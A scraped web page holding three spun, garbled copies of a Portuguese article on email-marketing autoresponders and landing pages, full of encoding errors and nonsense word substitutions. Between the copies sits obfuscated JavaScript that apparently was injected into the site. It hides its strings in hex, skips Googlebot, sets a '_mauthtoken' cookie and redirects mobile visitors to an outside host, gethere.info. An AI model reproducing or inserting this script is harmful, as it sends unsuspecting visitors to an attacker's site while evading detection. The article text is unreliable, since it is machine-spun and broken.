)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

l saiba como projetar 1 site funcional – parcela 2 Artigo: formato, espaA�os e cores

Qual A� www.giallo-polenta.it este maior erro que as pessoas cometem em suas anuncios de email marketing? NA?o A� uma estratA�gia ruim – embora a mA? estratA�gia mesmo que um fator importante para arruinar qualquer potencial de lucro que um site, produto ou ideia possa ter. E nA?o, nA?o A� falta de leads – obter sua lista A� surpreendentemente fA?cil, jA? que vocA? sabe o caminho certo para fazA?-lo. O maior erro que as pessoas cometem foi o seguinte: elas assumem que o e-mail marketing deve ser deixado a cargo dos entendidos na matA�ria e nA?o se preocupe em aprender nada a respeito de isso!

Gente, eu nA?o estou brincando sobre isso. HA? toneladas e toneladas de sites por aA� com planos de negA?cios perfeitamente rentA?veis que estA?o perdendo ouro puro, ignorando suas anuncios de marketing por e-mail. E nA?o, o envio de boletins informativos mensais sobre atualizaA�A�es no sitio nA?o constitui um e-mail marketing. E-mail marketing foi um processo de geraA�A?o de negA?cios atravA�s da manutenA�A?o do uma lista de contatos de e-mail – pessoas que se inscrevem na sua lista por 1 motivo ou outro (geralmente para obter acesso a informaA�A�es ou a destemido outro recurso). Uma campanha executada corretamente envolve pelo menos este seguinte: * CriaA�A?o por um relacionamento positivo e responsivo com sua lista. * Prover sua lista com uma razA?o para confiar em vocA? e em seu conselho (dA? informaA�A�es de qualidade primeiro, peA�a o dinheiro deles mais tarde). * Promover suplementos direcionados e A?teis para sua lista (relacionados (direta ou indiretamente) com a razA?o atravA�s qual eles se inscreveram em sua lista.

O visitante verA? nessa lista por pontos de que o simples envio de ofertas promocionais para muitos endereA�os do e-mail nA?o se qualifica como e-mail marketing. NA?o. Isso A� spam. NA?o seja como a maioria das pessoas na Internet. Se vocA? estacionaestaficafixa jazepararpermanecequeda operando em um nicho on-line, A� especialmente quase garantido que vocA? esteja sentado em uma pequena mina de ouro. Tire proveito disso por todos os meios possA�veis e faA�a o esforA�o para criar sua prA?pria campanha de marketing por e-mail.

As ferramentas.

Para configurar sua campanha de marketing por e-mail, vocA? precisa do seguinte:

* Um autoresponder confiA?vel.

* Um formulA?rio de captura por chumbo / pA?gina do destino.

* Significa trazer trA?fego para essa pA?gina de fatalidade. * 1 conjunto por mensagens prA�-escritas para sua lista.

* Um programa de marketing por email.

Se isso parece demais, nA?o se preocupe. Todos os cinco pontos sA?o explicados detalhadamente abaixo.

Este autoresponder 1 autoresponder A� especialmente a ferramenta mais poderosa no seu arsenal de e-mail marketing. Essencialmente, ele nA?o apenas automatiza o gerenciamento de listas (incluindo solicitaA�A�es de assinatura e cancelamento de assinatura), mas tambA�m pode automatizar o processo de envio de e-mails para sua prA?pria lista. VocA? pode carregar um argumento de e-mails / mensagens para sua prA?pria lista em seu autoresponder, e o script enviarA? estes e-mails automaticamente nas datas que vocA? especificar. Estes dois autoresponders que eu recomendaria sA?o AWeber e GetResponse. Ambos tA?m preA�os razoA?veis e espetaculares caracterA�sticas. Eu pessoalmente uso o Aweber, embora se vocA? quiser testar autoresponders e ver como eles funcionam eu sugiro de que vocA? se inscreva para a versA?o gratuita do GetResponse e experimente lA? primeiro. Configurando um autoresponder A� deveras simples. Tanto o AWeber quanto este GetResponse tA?m um procedimento simples de inscriA�A?o e, quando vocA? entra, eles fornecem tutoriais detalhados para ajudA?-lo a configurar seu desenvolvimento de gerenciamento de listas.

Mensagens prA�-escritas O gerenciamento de listas A� realmente simples usando autoresponders. VocA? pode prA�-carregar sua conta com respostas de modelo para qualquer uma de seguintes ocasiA�es: * Quando alguA�m se inscrever por meio do um formulA?rio de captura de leads. * Quando alguA�m confirma sua inscriA�A?o na sua lista. * Quando alguA�m cancelar a assinatura da sua lista. * Quando alguA�m envia um email para este seu endereA�o de email do autoresponder (pode configurar esta mensagem para dizer ao remetente que irA? responder dentro de 1 determinado perA�odo de tempo ou redirecionA?-lo para um endereA�o de email diferente). AlA�m disso, vocA? pode escrever muitos e-mails usando antecedA?ncia (no caso do vocA? querer enviar mensagens para seus assinantes em datas especA�ficas no futuro) e carregA?-los em seu autoresponder. Em seguida, basta especificar as datas nas quais vocA? deseja que cada mensagem seja enviada e seu produA�A?o estA? concluA�do. O autoresponder cuida por todo este resto. Este prA�-carregamento por mensagens no seu autoresponder A� especialmente uma A?tima maneira do agendar 1 curso do email informativo ou se vocA? quiser enviar muitos emails promocionais para este mesmo resultado. A maioria dos autoresponders (incluindo AWeber e GetResponse) oferecem modelos para mensagens genA�ricas (como a lista acima), tornando seu trabalho muito mais bronco. Tudo o que vocA? realmente precisa A� personalizar esses modelos, se preciso, e depois carregar as suas prA?prias mensagens.

Landing Page

Muitas pessoas simplesmente usam uma inscriA�A?o para este nosso boletim informativo? espA�cie de caixa em suas pA?ginas importantes e esperamos que as pessoas entrem na loja. NA?o A� assim que funciona. Para as pessoas se inscreverem na sua lista, elas devem estar interessadas no que vocA? tem a dizer. Isso significa que primeiro vocA? possui que educar seus assinantes em potencial para este que eles tA?m a ganhar entregando seus endereA�os de e-mail para o visitante. Configure uma pA?gina separada em seu website como uma pA?gina por destino. Nesta pA?gina, o visitante incluiria uma descriA�A?o do seu boletim informativo, natural como estes principais pontos positivos para seus assinantes se inscreverem no boletim informativo (um relatA?rio gratuito sobre atualizaA�A�es semanais, ou dicas de namoro regulares, ou qualquer que seja este seu nicho). A chave aqui A� convencer este leitor que, se eles estiverem interessados em seu campo, A� uma vantagem para eles assinarem o boletim informativo, como A� o lugar mA?gico para adquirir as mais proveitosos informaA�A�es a cerca de esse campo. E, significativo, fornecer 1 formulA?rio chocho para os visitantes preencherem e se inscreverem em seu boletim informativo.

Direcionar trA?fego

AtA� doravante, vocA? estA? pronto para construir sua prA?pria lista e aumentar as vendas atravA�s de seu autoresponder. Mas primeiro, o visitante precisa direcionar o trA?fego (leia pessoas reais) para sua pA?gina de destino para que eles permitam se inscrever em sua prA?pria lista. Veja uma breve discussA?o do algumas tA?ticas que o visitante pode utilizar:

* Escrever e enviar artigos em um diretA?rio do post de nicho.

Certifique-se de incluir sua caixa do recurso no fim do post, com 1 texto descrevendo seu curso por e-mail e 1 link voltando para sua prA?pria pA?gina do destino. Isso A� deveras elementar, mas ainda foi surpreendente tais como poucas vizinhos acabam aproveitando-se disso, usando a certeza de que vocA? se concentra nos importantes sites abastados em conteA?do do seu nicho ao enviar esses artigos.

* Se vocA? espera lucrar significativamente usando seus assinantes (na prA?xima liA�A?o, como vocA? pode vir a calcular este valor da vida A?til do seu assinante), vocA? pode gastar algum valor na criaA�A?o de sua lista.

Use o Google AdWords ou o Yahoo Search Marketing para direcionar o trA?fego segmentado para sua pA?gina de fatalidade. A chave aqui A� fazer lances em frases muito especA�ficas de duas e 3 palavras, para que nA?o apenas seu trA?fego mesmo que segmentado, contudo tambA�m de que vocA? possa obter esses cliques usando a certeza de nA?o pagar 1 preA�o alto por clique ( 1 visitante), caso contrA?rio, este processo pode sair atravA�s culatra em vocA?.

* Simples como parece, certifique-se de promover o seu boletim informativo em seu sitio. NA?o se limite a escolher um link em todas as pA?ginas – inclua algum texto e realmente explique em poucas palavras o que o boletim informativo oferece (como um anA?ncio de PPC).

* Propor um brinde – isso pode ser uma ferramenta gratuita ou acesso a uma divisA?o do seu site (onde vocA? guarda o porreiro conteA?do) ou atA� precisamente um relatA?rio para download. Este A� especialmente de distanciado o ainda mais comum que os funcionA?rios de marketing usam para construir sua lista.

* Se vocA? tiver 1 discurso por vendas no seu site, certifique-se de que seu boletim informativo gratuito esteja em destaque nele. Ele fornecerA? aos leitores uma alternativa isenta de perigos para testA?-lo e descobrir se vocA? realmente tA?m a possibilidade de cumprir qualquer reivindicaA�A?o fabricada no discurso de vendas. AlA�m disso, muitas pessoas nA?o compram imediatamente – elas tendem a avaliar estes prA?s e contras e deliberar bastante sobre as decisA�es do compra (especialmente decisA�es de compra caras). Ao propor a eles a opA�A?o de se inscrever em seu boletim informativo, vocA? garante uma trilha interna para a compra ou nA?o de debate em as suas mentes e estA? em posiA�A?o por ganhar sua confianA�a e ganhar seu dinheiro.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

l tais como projetar um site funcional – parcela 2 Texto: formato, espaA�os e cores

Qual A� este maior engano que as pessoas cometem em suas campanhas de email marketing? NA?o A� uma estratA�gia ruim – ainda que a mA? estratA�gia seja um fator importante para arruinar qualquer potencial do lucro de que um site, produto ou ideia possa ter. E nA?o, nA?o A� falta de leads – obter sua lista A� surpreendentemente fA?cil, visto que vocA? sabe o caminho certo para fazA?-lo. Este maior erro que os indA�viduos cometem A� especialmente o seguinte: elas assumem que este e-mail marketing deve ser deixado a cargo dos entendidos na matA�ria e nA?o se preocupe em aprender nada sobre isso!

Gente, eu nA?o estou brincando sobre isso. HA? toneladas e toneladas de sites por aA� com planos de negA?cios perfeitamente rentA?veis que estA?o perdendo ouro puro, ignorando suas campanhas de marketing por e-mail. E nA?o, o envio de boletins informativos mensais sobre atualizaA�A�es no site nA?o constitui um e-mail marketing. E-mail marketing A� um processo de geraA�A?o de negA?cios atravA�s da manutenA�A?o do uma lista de contatos de e-mail – pessoas que se inscrevem na sua lista por 1 motivo ou outro (geralmente para obter acesso a informaA�A�es ou a destemido outro recurso). Uma campanha executada corretamente envolve pelo menos o seguinte: * CriaA�A?o de um relacionamento positivo e responsivo com sua lista. * Fornecer sua lista com uma razA?o para confiar em vocA? e em seu conselho (dA? informaA�A�es de excelA?ncia primeiro, peA�a o dinheiro deles mais tarde). * Promover suplementos direcionados e A?teis para sua lista (relacionados (direta ou indiretamente) com a razA?o pela qual eles se inscreveram em sua lista.

VocA? verA? nessa lista de pontos que o chocho envio do ofertas promocionais para muitos endereA�os de e-mail nA?o se qualifica como e-mail marketing. NA?o. Isso A� spam. NA?o seja saiba como a maioria das pessoas na Internet. Se vocA? estA? operando em um nicho on-line, A� quase garantido que vocA? esteja sentado em uma pequena mina de ouro. Tire proveito disso por todos os meios possA�veis e faA�a o esforA�o para criar sua prA?pria prA?pria campanha de marketing por e-mail.

As ferramentas.

Para configurar sua campanha de marketing por e-mail, vocA? precisa do seguinte:

* Um autoresponder confiA?vel.

* Um formulA?rio por captura de chumbo / pA?gina de destino.

* Significa trazer trA?fego para essa pA?gina de destino. * Um conjunto de mensagens prA�-escritas para sua lista.

* Um plano de marketing por email.

Se isso parece em demasia, nA?o se preocupe. Todos os cinco pontos sA?o explicados detalhadamente abaixo.

Este autoresponder 1 autoresponder A� a ferramenta mais poderosa no seu arsenal de e-mail marketing. Essencialmente, ele nA?o apenas automatiza o gerenciamento de listas (incluindo solicitaA�A�es de assinatura e cancelamento de assinatura), mas igualmente pode automatizar o desenvolvimento de envio de e-mails para sua lista. O visitante pode carregar um conjunto de e-mails / mensagens para sua lista no seu autoresponder, e o script enviarA? estes e-mails automaticamente nas datas que vocA? especificar. Os dois autoresponders que eu recomendaria sA?o AWeber e GetResponse. Ambos tA?m preA�os razoA?veis e excelentes caracterA�sticas. Eu pessoalmente uso o Aweber, embora se vocA? quiser testar autoresponders e ver como eles funcionam eu sugiro que vocA? se inscreva para a variaA�A?o gratuita do GetResponse e experimente lA? primeiro. Configurando um autoresponder A� em muito simples. Tanto o AWeber quanto este GetResponse tA?m um procedimento simples do inscriA�A?o e, quando vocA? entra, eles fornecem tutoriais detalhados para ajudA?-lo a configurar seu processo de gerenciamento de listas.

Mensagens prA�-escritas O gerenciamento de listas A� realmente simples com autoresponders. O visitante pode prA�-carregar sua conta com respostas de modelo para qualquer uma de seguintes ocasiA�es: * Quando alguA�m se inscrever por meio do um formulA?rio de captura de leads. * Quando alguA�m confirma sua inscriA�A?o na sua lista. * Quando alguA�m cancelar a assinatura da sua lista. * Quando alguA�m envia um email para o seu endereA�o de email do autoresponder (pode configurar esta recado para dizer ao remetente que irA? responder dentro de 1 determinado perA�odo de tempo ou redirecionA?-lo para 1 endereA�o por email diferente). AlA�m disso, vocA? tA?m a possibilidade de escrever vA?rios e-mails com antecedA?ncia (no caso do vocA? querer enviar mensagens para seus assinantes em datas especA�ficas no futuro) e carregA?-los em seu autoresponder. Em seguida, basta especificar as datas nas quais vocA? deseja que cada mensagem seja enviada e seu manejorefregatrA?fego estA? concluA�do. O autoresponder cuida de todo este resto. O prA�-carregamento por mensagens no seu autoresponder A� especialmente uma A?tima maneira de agendar 1 curso de email informativo ou se vocA? quiser enviar muitos emails promocionais para este mesmo produto. A maioria destes autoresponders (incluindo AWeber e GetResponse) oferecem modelos para mensagens genA�ricas (como a lista acima), tornando seu trabalho demasiado mais bronco. Tudo este que o visitante realmente precisa A� personalizar esses modelos, se preciso, e posteriormente carregar suas prA?prias mensagens.

Landing Page

Muitas pessoas simplesmente usam uma inscriA�A?o para o nosso boletim informativo? tipo de caixa em suas pA?ginas importantes e esperamos que as pessoas entrem na loja. NA?o A� assim que funciona. Para as pessoas se inscreverem na sua lista, elas devem estar interessadas no de que vocA? possui a dizer. Isso significa que 1o vocA? possui que educar seus assinantes em potencial para o que eles tA?m a ganhar entregando seus endereA�os de e-mail para o visitante. Configure uma pA?gina separada em seu website como uma pA?gina de destino. Nesta pA?gina, vocA? incluiria uma descriA�A?o do seu boletim informativo, bem como estes principais pontos positivos para seus assinantes se inscreverem pelo boletim informativo (um relatA?rio gratuito a respeito de atualizaA�A�es semanais, ou dicas de namoro regulares, ou qualquer que seja este seu nicho). A chave aqui foi convencer o leitor de que, se eles estiverem interessados em seu campo, A� uma vantagem para eles assinarem o boletim informativo, pois A� o lugar ideal para adquirir as mais apetecA�veis informaA�A�es a respeito de esse campo. E, significativo, fornecer um formulA?rio chocho para estes visitantes preencherem e se inscreverem em seu boletim informativo.

Direcionar trA?fego

AtA� agora, vocA? permanecequeda pronto para construir sua lista e aumentar as vendas atravA�s de seu autoresponder. Mas primeiro, o visitante precisa direcionar o trA?fego (leia pessoas reais) para sua pA?gina de destino para que eles permitam se inscrever em sua prA?pria lista. Aprecie uma breve discussA?o de algumas tA?ticas que vocA? pode usar:

* Escrever e enviar artigos em um diretA?rio do post de nicho.

Certifique-se de incorporar sua caixa do recurso no final do post, com um texto descrevendo seu curso por e-mail e 1 link voltando para sua pA?gina de destino. Isso A� deveras elementar, contudo ainda foi surpreendente como poucas vizinhos acabam aproveitando-se disso, com a certeza de que o visitante se concentra nos fundamentais sites ricos em conteA?do do seu nicho ao enviar esses artigos.

* Se vocA? espera lucrar significativamente com seus assinantes (na prA?xima liA�A?o, saiba como vocA? tA?m a possibilidade de calcular este valor da vida eficaz do seu assinante), vocA? pode gastar algum dinheiro na criaA�A?o de sua prA?pria lista.

Use o Google AdWords ou o Yahoo Search Marketing para direcionar o trA?fego segmentado para sua pA?gina de destino. A chave aqui A� especialmente fazer lances em frases muito especA�ficas de duas e trA?s palavras, para que nA?o apenas seu trA?fego seja segmentado, mas tambA�m que vocA? possa obter esses cliques usando a certeza de nA?o pagar 1 preA�o inconveniente por clique ( 1 visitante), caso contrA?rio, este processo pode vir a sair pela culatra em vocA?.

* Simples como parece, certifique-se de promover o seu boletim informativo em seu sitio. NA?o se limite a escolher 1 link em todas as pA?ginas – inclua algum texto e realmente explique em poucas palavras browardcountywebsites.com o que o boletim informativo oferece (como um anA?ncio de PPC).

* Oferecer um brinde – isso pode ser uma ferramenta gratuita ou acesso a uma divisA?o do seu site (onde vocA? guarda o bom conteA?do) ou atA� mesmo um relatA?rio para download. Este A� especialmente de longe o muito mais comum de que os profissionais de marketing usam para construir sua lista.

* Se vocA? tiver um discurso de vendas no seu site, certifique-se de que seu boletim informativo gratuito esteja em destaque nele. Ele fornecerA? aos leitores uma alternativa isenta de riscos para testA?-lo e descobrir se vocA? realmente pode cumprir qualquer reivindicaA�A?o produzida no discurso de vendas. AlA�m disso, muitas pessoas nA?o compram imediatamente – elas tendem a avaliar estes prA?s e contras e deliberar bastante sobre as decisA�es por compra (especialmente decisA�es por compra caras). Ao oferecer a eles a opA�A?o de se inscrever no seu boletim informativo, vocA? garante uma trilha interna para a adquire ou nA?o de debate em as suas mentes e estA? em posiA�A?o por ganhar sua prA?pria confianA�a e ganhar seu dinheiro.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

l como projetar 1 site funcional – parte 2 Post: formato, espaA�os e cores

Qual A� o maior erro que os indA�viduos cometem em suas campanhas de email marketing? NA?o A� uma estratA�gia ruim – ainda que a mA? estratA�gia mesmo que um fator importante para arruinar qualquer potencial de lucro que um sitio, produto ou ideia possa ter. E nA?o, nA?o A� carA?ncia de leads – obter sua lista A� surpreendentemente fA?cil, visto que vocA? sabe o caminho certo para fazA?-lo. O maior engano que as pessoas cometem A� o seguinte: elas assumem que o e-mail marketing deve ser deixado a cargo dos especialistas e nA?o se preocupe em saber nada a respeito de isso!

Gente, eu nA?o estou brincando sobre isso. HA? toneladas e toneladas de sitios por aA� com planos de negA?cios perfeitamente rentA?veis que estA?o perdendo ouro puro, ignorando suas anuncios de marketing por e-mail. E nA?o, o envio de boletins informativos mensais sobre atualizaA�A�es no sitio nA?o constitui um e-mail marketing. E-mail marketing foi um desenvolvimento de geraA�A?o de negA?cios atravA�s da manutenA�A?o de uma lista de contatos de e-mail – vizinhos que se inscrevem na sua lista por um motivo ou outro (geralmente para conseguir acesso a informaA�A�es ou a algum outro recurso). Uma campanha executada corretamente envolve pelo menos este seguinte: * CriaA�A?o por um relacionamento positivo e responsivo usando sua lista. * Prover sua lista com uma razA?o para confiar em vocA? e em seu conselho (dA? informaA�A�es de excelA?ncia primeiro, peA�a o valor deles mais tarde). * Promover produtos direcionados e A?teis para sua lista (relacionados (direta ou indiretamente) com a razA?o atravA�s qual eles se inscreveram em sua prA?pria lista.

O visitante verA? nessa lista por pontos de que o chocho envio do ofertas promocionais para muitos endereA�os por e-mail nA?o se qualifica como e-mail marketing. NA?o. Isso A� especialmente spam. NA?o seja saiba como a maioria de pessoas na Internet. Se vocA? permanecequeda operando em um nicho on-line, A� especialmente quase garantido que o visitante esteja sentado em uma pequena mina de ouro. Tire proveito disso por todos os meios possA�veis e faA�a o esforA�o para criar sua prA?pria campanha de marketing por e-mail.

As ferramentas.

Para configurar sua campanha de marketing por e-mail, vocA? precisa do seguinte:

* 1 autoresponder confiA?vel.

* Um formulA?rio de captura por chumbo / pA?gina por destino.

* Significa trazer trA?fego para essa pA?gina de fatalidade. * Um conjunto por mensagens prA�-escritas para sua lista.

* Um programa de marketing por email.

Se isso parece demais, nA?o se preocupe. Todos os 5 pontos sA?o explicados detalhadamente abaixo.

O autoresponder 1 autoresponder A� especialmente a ferramenta mais poderosa no seu arsenal de e-mail marketing. Essencialmente, ele nA?o apenas automatiza o gerenciamento de listas (incluindo solicitaA�A�es de assinatura e cancelamento de assinatura), mas igualmente pode automatizar o desenvolvimento de envio de e-mails para sua lista. O visitante pode carregar um conjunto de e-mails / mensagens para sua prA?pria lista em seu autoresponder, e o script enviarA? os e-mails automaticamente nas datas que o visitante especificar. Estes dois autoresponders que eu recomendaria sA?o AWeber e GetResponse. Ambos tA?m preA�os razoA?veis e espetaculares caracterA�sticas. Eu pessoalmente uso o Aweber, embora se vocA? quiser testar autoresponders e olhar como eles funcionam eu sugiro que vocA? se inscreva para a versA?o gratuita do GetResponse e experimente lA? primeiro. Configurando um autoresponder A� bastante simples. Tanto o AWeber quanto o GetResponse tA?m um procedimento simples do inscriA�A?o e, quando vocA? entra, eles fornecem tutoriais detalhados para ajudA?-lo a configurar seu processo de gerenciamento de listas.

